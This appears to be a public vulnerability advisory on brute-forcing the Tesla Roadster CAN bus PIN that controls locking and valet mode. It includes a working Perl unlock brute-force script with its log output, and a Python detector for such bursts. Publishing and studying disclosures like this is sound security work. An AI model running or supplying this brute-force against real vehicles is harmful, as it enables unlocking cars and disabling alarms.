SUMMARY
The Tesla Roadster instrumentation CAN bus (running at 1MHz) supports a CAN bus message to lock/unlock the car and to enable/disable valet mode. Authentication for this message is a simple user PIN code, typically 4 digits (but up to 8 digits).
It appears that this is vulnerable to brute-force attack as there is no rate limiting on reception/interpretation of that message.
TECHNICAL DETAILS
The CAN bus message is:
ID: 0x102
B1: 0x0B
B2: function code
    0x00 = Activate valet mode
    0x01 = Deactivate valet mode
    0x02 = Lock car
    0x03 = Unlock car
B3: 0x00
B4: 0x00
B5: PIN LSB
B6: PIN
B7: PIN
B8: high 4 bits = number of PIN characters (1-8), low 4 bits = PIN MSB
(28 bits in total for the PIN, spread across B5-B8, least significant byte first)
Note: Example: an unlock with PIN 1234 is 0x0B, 0x03, 0x00, 0x00, 0xD2, 0x04, 0x00, 0x40 (1234 = 0x4D2, so B5 = 0xD2 and B6 = 0x04; B8 = 0x40 encodes a 4-digit PIN with a zero MSB nibble).
Note: Unlock/lock does not affect the immobilizer+alarm (fitted on vehicles outside North America)
An example script (Perl), using a laptop and a USB-to-CAN-bus adaptor:
# $canusb: filehandle already opened to the USB-CAN adaptor's serial port (assumed; not shown).
# The adaptor takes ASCII frames: 't' + 11-bit ID + DLC + data bytes, i.e. 't102' '8' then
# B1 = 0x0B, B2 = function code, B3/B4 = 0x00, B5..B8 = PIN as documented above.
sub teslacrack {
    my ($fn, $pin) = @_;            # $pin is passed as a zero-padded string so length() is the digit count
    my $msg = sprintf 't10280b%02x0000%02x%02x%02x%02x',
        $fn,
        $pin & 0xff,                                  # B5: PIN LSB
        ($pin >> 8) & 0xff,                           # B6
        ($pin >> 16) & 0xff,                          # B7
        (length($pin) << 4) | (($pin >> 24) & 0x0f);  # B8: digit count in high nibble, PIN MSB in low nibble
    print $canusb $msg, "\r";
}
for my $p (0 .. 9999) {
    teslacrack(3, sprintf('%04d', $p));  # function 3 = unlock
}
Transmitting at 100 messages / second, I tested PINs 0000 through 9999 in 100 seconds. Average PIN discovery time was thus approximately 50 seconds at this rate.
1493791128.000 CXX TESLACRACK FN#3 PIN5142 => t10280b03000016140040
1493791128.000 CXX TESLACRACK FN#3 PIN5143 => t10280b03000017140040
1493791128.000 CXX TESLACRACK FN#3 PIN5144 => t10280b03000018140040
1493791128.000 CXX TESLACRACK FN#3 PIN5145 => t10280b03000019140040
1493791128.000 CXX TESLACRACK FN#3 PIN5146 => t10280b0300001a140040
1493791128.000 CXX TESLACRACK FN#3 PIN5147 => t10280b0300001b140040
1493791128.000 CXX TESLACRACK FN#3 PIN5148 => t10280b0300001c140040
1493791128.000 CXX TESLACRACK FN#3 PIN5149 => t10280b0300001d140040
1493791128.000 CXX TESLACRACK FN#3 PIN5150 => t10280b0300001e140040
1493791128.000 CXX TESLACRACK FN#3 PIN5151 => t10280b0300001f140040
1493791128.000 CXX TESLACRACK FN#3 PIN5152 => t10280b03000020140040
1493791128.000 CXX TESLACRACK FN#3 PIN5153 => t10280b03000021140040
1493791128.000 CXX TESLACRACK FN#3 PIN5154 => t10280b03000022140040
1493791128.000 CXX TESLACRACK FN#3 PIN5155 => t10280b03000023140040
1493791128.000 CXX TESLACRACK FN#3 PIN5156 => t10280b03000024140040
1493791128.000 CXX TESLACRACK FN#3 PIN5157 => t10280b03000025140040
1493791128.000 CXX TESLACRACK FN#3 PIN5158 => t10280b03000026140040
1493791128.000 CXX TESLACRACK FN#3 PIN5159 => t10280b03000027140040
1493791128.000 CXX TESLACRACK FN#3 PIN5160 => t10280b03000028140040
1493791128.000 CXX TESLACRACK FN#3 PIN5161 => t10280b03000029140040
1493791128.000 CXX TESLACRACK FN#3 PIN5162 => t10280b0300002a140040
The CAN-USB adaptor I used was limited to approximately 100 messages / second. A faster adaptor could seemingly brute force this with greater speed.
Although not used in this brute-force test, the VMS sends a CAN bus message indicating the lock status: ID 0x100, B1 = 0x96. That message can be used to programmatically verify whether the PIN code just tried was correct.
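As an added example (not code from the original advisory), the following Python decodes the 0x102 PIN message from the 't'-style adaptor frames shown above and applies the kind of rate check the bus itself lacks: a sliding window that flags a burst of distinct PIN values on that ID. The sample lines are constructed here to match the advisory's log format; the 0x100 status frame bytes are likewise constructed.

```python
import re

FUNCTIONS = {0x00: "activate valet", 0x01: "deactivate valet", 0x02: "lock", 0x03: "unlock"}

# Constructed sample lines (timestamp, then SLCAN-style 't' frame) in the advisory's log
# format: one unlock well before a burst of distinct PINs, then a 0x100 status frame.
SAMPLE_LOG = [
    "1493791100.000 t10280b030000d2040040",  # PIN 1234 unlock (the advisory's example bytes)
    "1493791128.000 t10280b03000016140040",  # PIN 5142
    "1493791128.010 t10280b03000017140040",  # PIN 5143
    "1493791128.020 t10280b03000018140040",  # PIN 5144
    "1493791128.030 t10280b03000019140040",  # PIN 5145
    "1493791128.040 t10280b0300001a140040",  # PIN 5146
    "1493791128.050 t10089600000000000000",  # ID 0x100 B1=0x96 lock-status frame, ignored
]

def decode_pin_frame(frame):
    """Decode 't' + 3-hex-digit ID + DLC + data; return {'function','pin','pin_len'}
    for the 0x102 / B1=0x0B PIN message, or None for anything else."""
    m = re.fullmatch(r"t([0-9a-fA-F]{3})([0-8])([0-9a-fA-F]*)", frame.strip())
    if not m:
        return None
    can_id, dlc, data = int(m.group(1), 16), int(m.group(2)), bytes.fromhex(m.group(3))
    if can_id != 0x102 or dlc != 8 or len(data) != 8 or data[0] != 0x0B:
        return None
    b5, b6, b7, b8 = data[4:8]
    pin_value = b5 | (b6 << 8) | (b7 << 16) | ((b8 & 0x0F) << 24)  # 28-bit PIN, LSB first
    pin_len = b8 >> 4                                             # digit count, high nibble
    return {"function": FUNCTIONS.get(data[1], "unknown"),
            "pin": str(pin_value).zfill(pin_len), "pin_len": pin_len}

def detect_pin_bruteforce(log_lines, window_s=1.0, max_attempts=3):
    """Sliding window: alert once per burst when more than max_attempts distinct PINs hit
    ID 0x102 within window_s seconds. Frame = last field, so the advisory's log parses too."""
    recent, alerts, alerted = [], [], False
    for line in log_lines:
        fields = line.split()
        decoded = decode_pin_frame(fields[-1])
        if decoded is None:
            continue
        ts = float(fields[0])
        recent = [(t, p) for t, p in recent if ts - t <= window_s] + [(ts, decoded["pin"])]
        distinct = len({p for _, p in recent})
        if distinct > max_attempts and not alerted:
            alerts.append((ts, distinct))
            alerted = True
        elif distinct <= max_attempts:
            alerted = False
    return alerts
```

Run against SAMPLE_LOG this reports a single alert at the fourth distinct PIN inside one second; a gateway or the VMS could apply the same window to refuse further attempts instead of merely logging them.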
IMPACT
The instrumentation CAN bus is available at various points in the car, with the simplest being the engineering diagnostic connector in the passenger footwell of the vehicle.
The PIN code permits the following functions:
- Enable valet mode
- Disable valet mode
- Lock the vehicle
- Unlock the vehicle
- Cancel the alarm (via unlocking the vehicle) in North American vehicles
- Change the PIN code
On vehicles outside North America, a separate alarm system and immobiliser is used. That system is not affected by this PIN code, so functions 4 and 5 (unlocking the vehicle, and cancelling the alarm) will have limited impact on these vehicles.
There is a separate physical key used to start the vehicle, and unlock the steering wheel, that is not affected by this vulnerability.
Overall, it seems that the greatest concerns for this brute force attack would be:
- Cancelling a sounding alarm on North American vehicles
- Providing access to the trunk and glove compartment of a locked vehicle
- Malicious prank to enable valet mode
- Malicious prank to change the PIN code (possibly after enabling valet mode)
MITIGATION
While the default PIN code provided with the vehicle is 4 digits, the system does seem to accept longer PIN codes. Use of a longer PIN code would increase the time taken to brute force it successfully, since each additional digit multiplies the number of candidate PINs by ten.
Reported: 3 May 2017
Classification: Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
Vendor Response: Declined to address, and no fix for more than 1 year, so public release
Public Release: 3 Dec 2018